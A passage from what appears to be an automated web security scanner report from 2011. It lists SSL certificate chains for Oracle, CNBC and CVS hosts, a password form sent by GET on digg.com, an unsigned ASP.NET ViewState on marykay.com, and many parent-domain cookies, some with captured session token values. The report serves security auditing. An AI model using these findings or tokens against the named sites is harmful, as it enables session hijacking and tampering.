Issued to:	*.oracle.com,ST=CALIFORNIA
Issued by:	Akamai Subordinate CA 3
Valid from:	Fri Apr 22 13:47:51 GMT-06:00 2011
Valid to:	Sun Apr 22 13:47:51 GMT-06:00 2012

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 09:32:00 GMT-06:00 2006
Valid to:	Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:	Mon Aug 13 17:59:00 GMT-06:00 2018

9.14. https://login.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	login.cnbc.com
Issued by:	Trusted Secure Certificate Authority
Valid from:	Sun Sep 27 18:00:00 GMT-06:00 2009
Valid to:	Wed Sep 28 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	Trusted Secure Certificate Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Thu Jun 28 12:14:35 GMT-06:00 2007
Valid to:	Sun Oct 28 12:44:35 GMT-06:00 2012

Certificate chain #2

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 10:09:40 GMT-06:00 1999
Valid to:	Sat May 25 10:39:40 GMT-06:00 2019

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 10:09:40 GMT-06:00 1999
Valid to:	Sat May 25 10:39:40 GMT-06:00 2019

9.15. https://login.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	login.oracle.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Mon Mar 21 18:00:00 GMT-06:00 2011
Valid to:	Wed Jun 20 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

9.16. https://myprofile.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.oracle.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Wed Mar 30 18:00:00 GMT-06:00 2011
Valid to:	Tue Jul 31 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

9.17. https://oracleus.wingateweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://oracleus.wingateweb.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.wingateweb.com
Issued by:	Entrust Certification Authority - L1C
Valid from:	Fri Apr 16 13:57:30 GMT-06:00 2010
Valid to:	Tue Apr 16 14:27:27 GMT-06:00 2013

Certificate chain #1

Issued to:	Entrust Certification Authority - L1C
Issued by:	Entrust.net Certification Authority (2048)
Valid from:	Thu Dec 10 14:43:54 GMT-06:00 2009
Valid to:	Tue Dec 10 15:13:54 GMT-06:00 2019

Certificate chain #2

Issued to:	Entrust.net Certification Authority (2048)
Issued by:	Entrust.net Certification Authority (2048)
Valid from:	Fri Dec 24 11:50:51 GMT-06:00 1999
Valid to:	Tue Jul 24 08:15:12 GMT-06:00 2029

9.18. https://register.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	register.cnbc.com
Issued by:	Trusted Secure Certificate Authority
Valid from:	Sun Sep 27 18:00:00 GMT-06:00 2009
Valid to:	Wed Sep 28 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	Trusted Secure Certificate Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Thu Jun 28 12:14:35 GMT-06:00 2007
Valid to:	Sun Oct 28 12:44:35 GMT-06:00 2012

Certificate chain #2

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 10:09:40 GMT-06:00 1999
Valid to:	Sat May 25 10:39:40 GMT-06:00 2019

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 10:09:40 GMT-06:00 1999
Valid to:	Sat May 25 10:39:40 GMT-06:00 2019

9.19. https://shop.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://shop.oracle.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.oracle.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Wed Mar 30 18:00:00 GMT-06:00 2011
Valid to:	Tue Jul 31 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

9.20. https://support.oracle.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.oracle.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.oracle.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Wed Mar 30 18:00:00 GMT-06:00 2011
Valid to:	Tue Jul 31 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

9.21. https://www.atg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.atg.com,ST=MASSACHUSETTS
Issued by:	Akamai Subordinate CA 3
Valid from:	Tue Jul 19 07:43:47 GMT-06:00 2011
Valid to:	Thu Jul 19 07:43:47 GMT-06:00 2012

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 09:32:00 GMT-06:00 2006
Valid to:	Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:	Mon Aug 13 17:59:00 GMT-06:00 2018

9.22. https://www.cvs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cvs.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.cvs.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Wed Oct 13 18:00:00 GMT-06:00 2010
Valid to:	Fri Oct 28 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

10. Password field submitted using GET method previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/submit

The form contains the following password field:

password

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11. ASP.NET ViewState without MAC enabled previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/default.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET /default.aspx?pid=mk HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Subsidiary=US; TLTHID=DFDB2FDD45BA94FC283A74BD7C3CBF64; TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; www.marykay.com=554376364.20480.0000

Response

12. Cookie scoped to parent domain previous next
There are 109 instances of this issue:

http://api.twitter.com/1/statuses/user_timeline.json
http://convctr.overture.com/images/cc/cc.gif
http://pg.links.origin.channelintelligence.com/pages/wl.asp
http://pixel.everesttech.net/1688/i
http://ttwbs.channelintelligence.com/
http://a.tribalfusion.com/displayAd.js
http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/j.ad
http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html
http://a.tribalfusion.com/z/i.cid
http://ads.pointroll.com/PortalServe/
http://api.bizographics.com/v1/profile.redirect
http://b.scorecardresearch.com/b
http://c.statcounter.com/t.php
http://clk.fetchback.com/serve/fb/click
http://clk.fetchback.com/serve/fb/engmnt
https://cms.paypal.com/us/cgi-bin/
http://developers.facebook.com/plugins/
http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi
http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage
http://id.google.com/verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif
http://imp.fetchback.com/serve/fb/adtag.js
http://imp.fetchback.com/serve/fb/imp
https://login.cnbc.com/cas/logout
http://m1215.ic-live.com/522/
http://m1460.ic-live.com/586/
http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1
http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js
http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js
http://optimized-by.rubiconproject.com/a/dk.html
http://optimized-by.rubiconproject.com/a/dk.js
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862
http://p.brilig.com/contact/bct
http://pi.pardot.com/analytics
http://ping.crowdscience.com/ping.js
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.quantserve.com/pixel
http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif
http://r.openx.net/img
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=64844327/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=70609416/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=7863048/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=80753902/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=92276994/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA
http://rt.legolas-media.com/lgrt
http://search.spotxchange.com/track/tag/6382.1008/img
http://server.iad.liveperson.net/hc/52793056/
http://services.krxd.net/geoip
http://services.krxd.net/pixel.gif
http://tags.bluekai.com/site/3834
http://www.actonsoftware.com/acton/bn/1227/visitor.gif
http://www.bizographics.com/collect/
http://www.marykay.com/
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_makeupartist.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg
http://www.marykay.com/CONTENT/HPflash/Thumbs/tb_twrandr.jpg
http://www.marykay.com/Common/SiteCatalyst/marykaycom/s_code.js
http://www.marykay.com/Content/HPflash/245_eyeColorBundle.swf
http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf
http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf
http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf
http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf
http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf
http://www.marykay.com/Content/HPflash/502_moc.swf
http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf
http://www.marykay.com/IMAGES/bkgLong.gif
http://www.marykay.com/Images/Checkout/viewbag/btn_x.png
http://www.marykay.com/Images/Site/FooterBack1.gif
http://www.marykay.com/Images/Site/hdottedline.gif
http://www.marykay.com/Images/Site/searchbox.gif
http://www.marykay.com/Images/Site/vdottedline.gif
http://www.marykay.com/Images/Site/wholeheader.jpg
http://www.marykay.com/JS/swfobject.js
http://www.marykay.com/Menu.css
http://www.marykay.com/Scripts/HeaderScript.js
http://www.marykay.com/Scripts/jquery-1.4.2.min.js
http://www.marykay.com/Styles.css
http://www.marykay.com/Styles_US.css
http://www.marykay.com/Themes/TabMenu/US/tabs.css
http://www.marykay.com/Themes/TabMenu/tabs.js
http://www.marykay.com/content/HPflash/portfolio_mk.xml
http://www.marykay.com/content/hpflash/stage.swf
http://www.marykay.com/default.aspx
http://www.marykay.com/favicon.ico
http://www.marykay.com/images/fflogo.jpg
http://www.marykay.com/images/icn_ec.jpg
http://www.marykay.com/images/icn_fb.jpg
http://www.marykay.com/images/icn_pbp.jpg
http://www.marykay.com/images/icn_vmo.jpg
http://www.marykay.com/images/icn_yt.jpg
http://www.marykay.com/images/ielogo.jpg
http://www.marykay.com/images/searchbutton.gif
http://www.marykay.com/scripts/i2a.js

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

12.1. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH00Xj8yAToHaWQiJTUyNTA5ZjQ3YzU2NjU3%250ANDczMjkwZTE4ZjM0ODEyNmJjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--356f1bbdd959d20fe46289e9da9efb4258cc6a16; domain=.twitter.com; path=/; HttpOnly
guest_id=v1%3A131532875890927681; domain=.twitter.com; path=/; expires=Fri, 06 Sep 2013 05:05:58 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json HTTP/1.1
Host: api.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 401 Unauthorized
Date: Tue, 06 Sep 2011 17:05:58 GMT
Server: hi
Status: 401 Unauthorized
WWW-Authenticate: OAuth realm="http://api.twitter.com"
X-Transaction: 1315328758-6109-39893
X-RateLimit-Limit: 150
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 06 Sep 2011 17:05:58 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.00626
Content-Type: application/json; charset=utf-8
Content-Length: 94
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 7b997ce2b49ff6792faaf34e1fe6d8827fe21243
X-RateLimit-Reset: 1315332358
Set-Cookie: guest_id=v1%3A131532875890927681; domain=.twitter.com; path=/; expires=Fri, 06 Sep 2013 05:05:58 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH00Xj8yAToHaWQiJTUyNTA5ZjQ3YzU2NjU3%250ANDczMjkwZTE4ZjM0ODEyNmJjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--356f1bbdd959d20fe46289e9da9efb4258cc6a16; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close

{"error":"This method requires authentication.","request":"\/1\/statuses\/user_timeline.json"}

12.2. http://convctr.overture.com/images/cc/cc.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://convctr.overture.com
Path:	/images/cc/cc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SessionData=02u3hs9yoaT4tKLixNTUk1sQEAY0NjI0c3cyNTU7Vj1ODi4vzMoDwuQUbORgamZuYWRoZupuYmAI4hjA4O; domain=.overture.com; path=/; expires=Tue, 06-Sep-2011 16:51:44 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/cc/cc.gif?ver=1.0&aID=9684550200&mkt=0&ref=http%3A//www.rayalab.com/%3Fgclid%3DCMuoq_OIiasCFRligwodfwxd4w HTTP/1.1
Host: convctr.overture.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/free_sample.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxMLAycAc8BMqgw=

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:44 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Set-Cookie: SessionData=02u3hs9yoaT4tKLixNTUk1sQEAY0NjI0c3cyNTU7Vj1ODi4vzMoDwuQUbORgamZuYWRoZupuYmAI4hjA4O; domain=.overture.com; path=/; expires=Tue, 06-Sep-2011 16:51:44 GMT
P3P: CP=" NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR STP IND UNI COM NAV INT STA "
Pragma: no-cache
Connection: close
Content-Type: image/gif
Content-Length: 34

GIF89a.............,...........L.;

12.3. http://pg.links.origin.channelintelligence.com/pages/wl.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pg.links.origin.channelintelligence.com
Path:	/pages/wl.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

sessionstamp=21967169; expires=Tue, 06-Sep-2011 17:45:36 GMT; domain=.channelintelligence.com; path=/
serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=30314234&nICnt=1&nDCnt=10&nRGID=1964&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=047400098961&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=841291_24552604_11302_48968727_13017277_2271669_64856419_13016956_48968727_26080384_8679155&nRID=0&sRnd=B96Gjac1 HTTP/1.1
Host: pg.links.origin.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=00047400302457
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 16:45:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D30314234%26nICnt%3D1%26nDCnt%3D10%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098961%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D841291%5F24552604%5F11302%5F48968727%5F13017277%5F2271669%5F64856419%5F13016956%5F48968727%5F26080384%5F8679155%26nRID%3D0%26sRnd%3DB96Gjac1
Content-Length: 716
Content-Type: image/gif
Expires: Tue, 06 Sep 2011 16:44:36 GMT
